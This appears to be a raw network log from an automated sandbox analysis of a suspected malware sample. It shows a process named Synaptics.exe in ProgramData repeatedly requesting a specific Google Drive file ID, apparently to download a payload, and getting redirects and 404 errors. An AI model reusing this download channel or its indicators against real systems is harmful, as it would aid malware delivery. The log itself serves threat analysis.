                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-G-Bj5WmIBPjDPw9VGvadDA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                    Content-Length: 1652
                                                                                                                                                                    Server: UploadServer
                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                                    Connection: close
                                                                                                                                                                    2024-12-30 03:59:43 UTC140INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20
                                                                                                                                                                    Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                                                                                                    2024-12-30 03:59:43 UTC1390INData Raw: 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 6d 7a 4a 6c 6e 45 61 7a 39 75 75 61 4e 67 46 53 70 30 56 6d 49 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b
                                                                                                                                                                    Data Ascii: 404 (Not Found)!!1</title><style nonce="mzJlnEaz9uuaNgFSp0VmIA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                                                                                                    2024-12-30 03:59:43 UTC122INData Raw: 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                                                                    Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    129192.168.2.449933142.250.181.2384435780C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    2024-12-30 03:59:44 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                    Host: docs.google.com
                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                    Cookie: NID=520=KZ7nPffwmFJuecPBYkTgj9o0Wg5xgIAtkZGmKeFEtVK_yIOnS3dX1hyC5NpZCfv0-4fpm_502tzUk1orbCiQoVAJo9C37QE_3LvtLcfGxAF8D3Oq1XIJNFGrxd4aflTZHQlukipdeVFIxx2i_7ZXQ_0JTnIe_5KuJkGrFW1bhZinXk3YLIXSJ04
                                                                                                                                                                    2024-12-30 03:59:44 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                                                    Content-Type: application/binary
                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                    Date: Mon, 30 Dec 2024 03:59:44 GMT
                                                                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-sSjLswB0OlnPnx0FZB_NLQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                    Server: ESF
                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                    Connection: close


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    130192.168.2.449932142.250.181.2384435780C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    2024-12-30 03:59:44 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                    Host: docs.google.com
                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                    Cookie: NID=520=KZ7nPffwmFJuecPBYkTgj9o0Wg5xgIAtkZGmKeFEtVK_yIOnS3dX1hyC5NpZCfv0-4fpm_502tzUk1orbCiQoVAJo9C37QE_3LvtLcfGxAF8D3Oq1XIJNFGrxd4aflTZHQlukipdeVFIxx2i_7ZXQ_0JTnIe_5KuJkGrFW1bhZinXk3YLIXSJ04
                                                                                                                                                                    2024-12-30 03:59:44 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                                                    Content-Type: application/binary
                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                    Date: Mon, 30 Dec 2024 03:59:44 GMT
                                                                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-j2UtMwApTsrGQ0BAuBOV7A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                    Server: ESF
                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                    Connection: close


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    131192.168.2.449934142.250.186.1294435780C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    2024-12-30 03:59:44 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                    Cookie: NID=520=KZ7nPffwmFJuecPBYkTgj9o0Wg5xgIAtkZGmKeFEtVK_yIOnS3dX1hyC5NpZCfv0-4fpm_502tzUk1orbCiQoVAJo9C37QE_3LvtLcfGxAF8D3Oq1XIJNFGrxd4aflTZHQlukipdeVFIxx2i_7ZXQ_0JTnIe_5KuJkGrFW1bhZinXk3YLIXSJ04
                                                                                                                                                                    2024-12-30 03:59:44 UTC1243INHTTP/1.1 404 Not Found
                                                                                                                                                                    X-GUploader-UploadID: AFiumC5r37CbweChk2TGgPGhD6xqGx7C3buvydAbuDfEFBq6L0Xkl1HX9F-9P8phRepuJEWW
                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                    Date: Mon, 30 Dec 2024 03:59:44 GMT
                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-On3dSMNrh260KPs37aMD_Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                    Content-Length: 1652
                                                                                                                                                                    Server: UploadServer
                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                                    Connection: close
                                                                                                                                                                    2024-12-30 03:59:44 UTC147INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f
                                                                                                                                                                    Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                                                                                                    2024-12-30 03:59:44 UTC1390INData Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 4d 69 63 75 76 6f 66 71 47 59 6e 6b 76 4c 48 63 56 5f 64 55 33 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67
                                                                                                                                                                    Data Ascii: t Found)!!1</title><style nonce="MicuvofqGYnkvLHcV_dU3Q">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                                                                                    2024-12-30 03:59:44 UTC115INData Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                                                                    Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    132192.168.2.449935142.250.186.1294435780C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    2024-12-30 03:59:44 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                    Cookie: NID=520=KZ7nPffwmFJuecPBYkTgj9o0Wg5xgIAtkZGmKeFEtVK_yIOnS3dX1hyC5NpZCfv0-4fpm_502tzUk1orbCiQoVAJo9C37QE_3LvtLcfGxAF8D3Oq1XIJNFGrxd4aflTZHQlukipdeVFIxx2i_7ZXQ_0JTnIe_5KuJkGrFW1bhZinXk3YLIXSJ04
                                                                                                                                                                    2024-12-30 03:59:44 UTC1243INHTTP/1.1 404 Not Found
                                                                                                                                                                    X-GUploader-UploadID: AFiumC40j5xr93o-FJlU-oWlboUMUfc3OpGaNDQFFG24qfvcFGy7C2jX6Ww3dMxEZmU02BEU
                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                    Date: Mon, 30 Dec 2024 03:59:44 GMT
                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-lgHlG5LH-6cazGUvZW6cbg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                    Content-Length: 1652
                                                                                                                                                                    Server: UploadServer
                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                                    Connection: close
                                                                                                                                                                    2024-12-30 03:59:44 UTC147INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f
                                                                                                                                                                    Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                                                                                                    2024-12-30 03:59:44 UTC1390INData Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 4a 43 66 71 64 6b 53 46 48 4f 4a 71 6c 4e 43 42 6d 37 6c 4d 59 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67
                                                                                                                                                                    Data Ascii: t Found)!!1</title><style nonce="JCfqdkSFHOJqlNCBm7lMYA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                                                                                    2024-12-30 03:59:44 UTC115INData Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                                                                    Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    133192.168.2.449936142.250.181.2384435780C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    2024-12-30 03:59:45 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                    Host: docs.google.com
                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                    Cookie: NID=520=KZ7nPffwmFJuecPBYkTgj9o0Wg5xgIAtkZGmKeFEtVK_yIOnS3dX1hyC5NpZCfv0-4fpm_502tzUk1orbCiQoVAJo9C37QE_3LvtLcfGxAF8D3Oq1XIJNFGrxd4aflTZHQlukipdeVFIxx2i_7ZXQ_0JTnIe_5KuJkGrFW1bhZinXk3YLIXSJ04
                                                                                                                                                                    2024-12-30 03:59:45 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                                                    Content-Type: application/binary
                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                    Date: Mon, 30 Dec 2024 03:59:45 GMT
                                                                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-MK4n0e629i_GuRmUpFW8rA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                    Server: ESF
                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                    Connection: close


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    134192.168.2.449937142.250.181.2384435780C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    2024-12-30 03:59:45 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                    Host: docs.google.com
                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                    Cookie: NID=520=KZ7nPffwmFJuecPBYkTgj9o0Wg5xgIAtkZGmKeFEtVK_yIOnS3dX1hyC5NpZCfv0-4fpm_502tzUk1orbCiQoVAJo9C37QE_3LvtLcfGxAF8D3Oq1XIJNFGrxd4aflTZHQlukipdeVFIxx2i_7ZXQ_0JTnIe_5KuJkGrFW1bhZinXk3YLIXSJ04
                                                                                                                                                                    2024-12-30 03:59:45 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                                                    Content-Type: application/binary
                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                    Date: Mon, 30 Dec 2024 03:59:45 GMT
                                                                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-M17-eTJWL7xHw2Lmc2cZ4A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                    Server: ESF
                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                    Connection: close


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    135192.168.2.449938142.250.186.1294435780C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    2024-12-30 03:59:45 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                    Cookie: NID=520=KZ7nPffwmFJuecPBYkTgj9o0Wg5xgIAtkZGmKeFEtVK_yIOnS3dX1hyC5NpZCfv0-4fpm_502tzUk1orbCiQoVAJo9C37QE_3LvtLcfGxAF8D3Oq1XIJNFGrxd4aflTZHQlukipdeVFIxx2i_7ZXQ_0JTnIe_5KuJkGrFW1bhZinXk3YLIXSJ04
                                                                                                                                                                    2024-12-30 03:59:45 UTC1250INHTTP/1.1 404 Not Found
                                                                                                                                                                    X-GUploader-UploadID: AFiumC4bjhMdS5hK0wr_aM45rZ4SV_aqjJI59Vd-dYagUCdI5ljz3LptmFJ1xU7tgpOtYyoJDgJ9zJc
                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                    Date: Mon, 30 Dec 2024 03:59:45 GMT
